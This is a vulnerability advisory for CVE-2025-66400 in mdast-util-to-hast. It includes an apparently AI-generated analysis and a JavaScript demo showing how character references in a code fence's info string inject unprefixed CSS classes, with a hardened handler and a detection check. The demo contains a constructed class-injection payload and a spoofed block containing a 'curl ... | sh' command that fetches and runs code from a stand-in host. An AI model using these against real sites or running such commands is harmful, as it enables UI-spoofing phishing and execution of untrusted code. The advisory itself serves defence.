
CVE-2025-66400: CWE-20: Improper Input Validation in syntax-tree mdast-util-to-hast

Severity: Medium
Tags: Vulnerability, CVE-2025-66400, CWE-20, CWE-915
Published: Mon Dec 01 2025 (12/01/2025, 22:17:42 UTC)
Source: CVE Database V5
Vendor/Project: syntax-tree
Product: mdast-util-to-hast

Description

mdast-util-to-hast is an mdast utility to transform to hast. From 13.0.0 to before 13.2.1, multiple (unprefixed) classnames could be added in markdown source by using character references. This could make rendered user supplied markdown code elements appear like the rest of the page. This vulnerability is fixed in 13.2.1.

AI-Powered Analysis

Last updated: 12/01/2025, 22:39:03 UTC

Technical Analysis

CVE-2025-66400 affects mdast-util-to-hast, the syntax-tree utility that transforms markdown syntax trees (mdast) into HTML syntax trees (hast); most applications pull it in transitively through remark-rehype. In versions 13.0.0 up to but not including 13.2.1, the handler for fenced code blocks derives the class attribute of the emitted code element from the block's language identifier without validating it: the identifier is prefixed with "language-" and used verbatim as the class name.

CommonMark decodes character references in a fence's info string, and the language is the first whitespace-delimited word of that string. An info string written as "js&#32;foo" therefore contains no literal whitespace when the parser picks the first word, but decodes to "js foo" before it reaches mdast-util-to-hast. The resulting attribute is class="language-js foo": the second token is an unprefixed class, and every additional reference adds another. Author-controlled markdown can thus attach arbitrary class names from the host page's stylesheet to a code block.

The record carries CWE-20 (Improper Input Validation) and CWE-915 (Improperly Controlled Modification of Dynamically-Determined Object Attributes), the latter because the attacker steers which attribute values the rendered element ends up with. The effect is presentational rather than script execution: no markup or JavaScript is injected, but a code block holding attacker-chosen text can be styled like a trusted element (a notice, a button, a navigation entry) and blend into the page, which supports phishing and misleading instructions wherever user-supplied markdown is rendered.

The CVSS 4.0 vector (AV:N/AC:L/AT:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N) records a network-reachable, low-complexity attack needing no privileges or user interaction, with low integrity impact and no effect on confidentiality or availability. The fix shipped in mdast-util-to-hast 13.2.1. No public exploit has been reported, but the precondition (rendering untrusted markdown) is common and the payload is a single line of text, so patching should not wait.

Potential Impact

For European organizations, as for any others, the exposure is UI spoofing in web applications, documentation portals, issue trackers, comment systems and wikis that render user-supplied markdown through an affected mdast-util-to-hast release. An attacker who can submit markdown can make a code block carry the page's own classes for alerts, buttons, badges or navigation, so attacker-written text such as a command to run or an account number to pay looks like part of the trusted interface. Confidentiality and availability are untouched and no script runs; the damage is to the integrity and authenticity of rendered content, which matters most in finance, healthcare, government and any service whose documentation users act on. Where content-integrity or consumer-protection obligations apply, an exploited instance may also draw regulatory attention. Exploitation needs nothing beyond the ability to post markdown, so public-facing platforms carry the most risk; with no exploit reported in the wild, there is still time to patch before abuse is observed.

Mitigation Recommendations

Audit dependency trees for mdast-util-to-hast versions 13.0.0 through 13.2.0. The package is usually a transitive dependency of remark-rehype, so check the lockfile (for example with npm ls mdast-util-to-hast) rather than package.json alone, and upgrade to 13.2.1 or later. Where the upgrade cannot ship immediately, sanitize the hast tree or the HTML after transformation rather than trying to strip character references from the markdown input: rehype-sanitize (hast-util-sanitize) with its default schema only permits class names beginning with "language-" on code elements and drops the rest, which neutralizes this issue. A Content Security Policy does not help here, because the injected classes select rules from the page's own stylesheet and no script or external resource is involved. As a detective control, scan rendered output for class attributes on code or pre elements whose tokens do not start with "language-". Treat all user-supplied markdown as untrusted input, make sure developers and content managers know that a renderer without a sanitizer is not a safe default, and watch upstream advisories for related reports.
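The following JavaScript is an added example, not code from the mdast-util-to-hast project. It models the pipeline described in the technical analysis above (info string to mdast code node to hast element to HTML) and implements the output check suggested in the mitigation. The character-reference decoder, the two handlers and the serializer are simplified stand-ins for micromark/mdast-util-from-markdown, mdast-util-to-hast and hast-util-to-html; the attacker info string and the class names in it are constructed for the demonstration; and the hardening shown is one reasonable fix chosen for this example, not a copy of the upstream 13.2.1 patch.

```javascript
// Added example, not code from mdast-util-to-hast. Models how a fenced code
// block's info string becomes a class attribute, why a character reference
// yields extra unprefixed classes, one way to harden the handler, and a
// detective check over rendered HTML.

// Approximates the CommonMark rule that character references are decoded in
// fenced-code info strings. Only numeric references and the three basic named
// ones are handled; that is enough to show the issue.
function decodeCharRefs(text) {
  return text
    .replace(/&#x([0-9a-f]+);/gi, (_, hex) => String.fromCodePoint(parseInt(hex, 16)))
    .replace(/&#(\d+);/g, (_, dec) => String.fromCodePoint(parseInt(dec, 10)))
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&')
}

// Builds an mdast-style `code` node from the raw info string of a fence (the
// text after the backticks) and the block body. The language is the first
// whitespace-delimited word of the *raw* string, decoded afterwards, so
// "js&#32;foo" contains no literal space when split but decodes to "js foo".
function parseFence(info, value) {
  const trimmed = info.trim()
  if (trimmed === '') return {type: 'code', lang: null, meta: null, value}
  const [rawLang, ...rest] = trimmed.split(/[ \t]+/)
  return {
    type: 'code',
    lang: decodeCharRefs(rawLang),
    meta: rest.length ? decodeCharRefs(rest.join(' ')) : null,
    value
  }
}

function wrapInPre(codeProperties, value) {
  return {
    type: 'element', tagName: 'pre', properties: {},
    children: [{
      type: 'element', tagName: 'code', properties: codeProperties,
      children: [{type: 'text', value: value + '\n'}]
    }]
  }
}

// Affected behaviour (modelled, not the library's source): the class is
// "language-" + lang with no check that lang is a single token.
function codeHandlerVulnerable(node) {
  const properties = {}
  if (node.lang) properties.className = ['language-' + node.lang]
  return wrapInPre(properties, node.value)
}

// One hardening: refuse any lang containing whitespace or a double quote, since
// neither can appear in a single valid class token. This is the example's own
// choice, not the upstream 13.2.1 fix.
function codeHandlerHardened(node) {
  const properties = {}
  if (node.lang && !/[\s"]/.test(node.lang)) {
    properties.className = ['language-' + node.lang]
  }
  return wrapInPre(properties, node.value)
}

// Minimal hast -> HTML serializer. className arrays are joined with spaces,
// which is exactly where the extra classes surface.
function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;')
}
function toHtml(node) {
  if (node.type === 'text') return escapeHtml(node.value)
  const attrs = Object.entries(node.properties)
    .map(([name, v]) => name === 'className'
      ? ` class="${escapeHtml(v.join(' '))}"`
      : ` ${name}="${escapeHtml(String(v))}"`)
    .join('')
  return `<${node.tagName}${attrs}>${node.children.map(toHtml).join('')}</${node.tagName}>`
}

// Detective check for rendered output: every class on a <code> or <pre>
// element that does not start with "language-" is reported.
function findUnprefixedCodeClasses(html) {
  const found = []
  const re = /<(?:code|pre)\b[^>]*\bclass="([^"]*)"/gi
  let m
  while ((m = re.exec(html)) !== null) {
    for (const cls of m[1].split(/\s+/)) {
      if (cls && !cls.startsWith('language-')) found.push(cls)
    }
  }
  return found
}

// Constructed attacker input: the info string of a fenced block inside
// user-supplied markdown. The class names are illustrative only.
const ATTACKER_INFO = 'text&#32;alert&#x20;alert-success'
const attackerNode = parseFence(ATTACKER_INFO, 'run: curl https://example.invalid/setup | sh')

const vulnerableHtml = toHtml(codeHandlerVulnerable(attackerNode))
const hardenedHtml = toHtml(codeHandlerHardened(attackerNode))
console.log(vulnerableHtml) // class="language-text alert alert-success"
console.log(hardenedHtml)   // no class attribute at all
console.log(findUnprefixedCodeClasses(vulnerableHtml)) // [ 'alert', 'alert-success' ]
```

Run it with node; the first line of output shows the attacker's two extra classes in the class attribute, the second shows the hardened handler dropping the class entirely because the decoded language contains whitespace, and the third shows the check that a CI step or log scanner could apply to rendered pages. Dropping the class rather than keeping only the first token is the conservative choice: it makes a tampered info string visible as a block with no highlighting instead of silently repairing it.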


Technical Details

Data Version: 5.2
Assigner Short Name: GitHub_M
Date Reserved: 2025-11-28T23:33:56.364Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 692e15786dbd3477d7482169

Added to database: 12/1/2025, 10:23:52 PM

Last enriched: 12/1/2025, 10:39:03 PM

Last updated: 12/1/2025, 11:29:03 PM



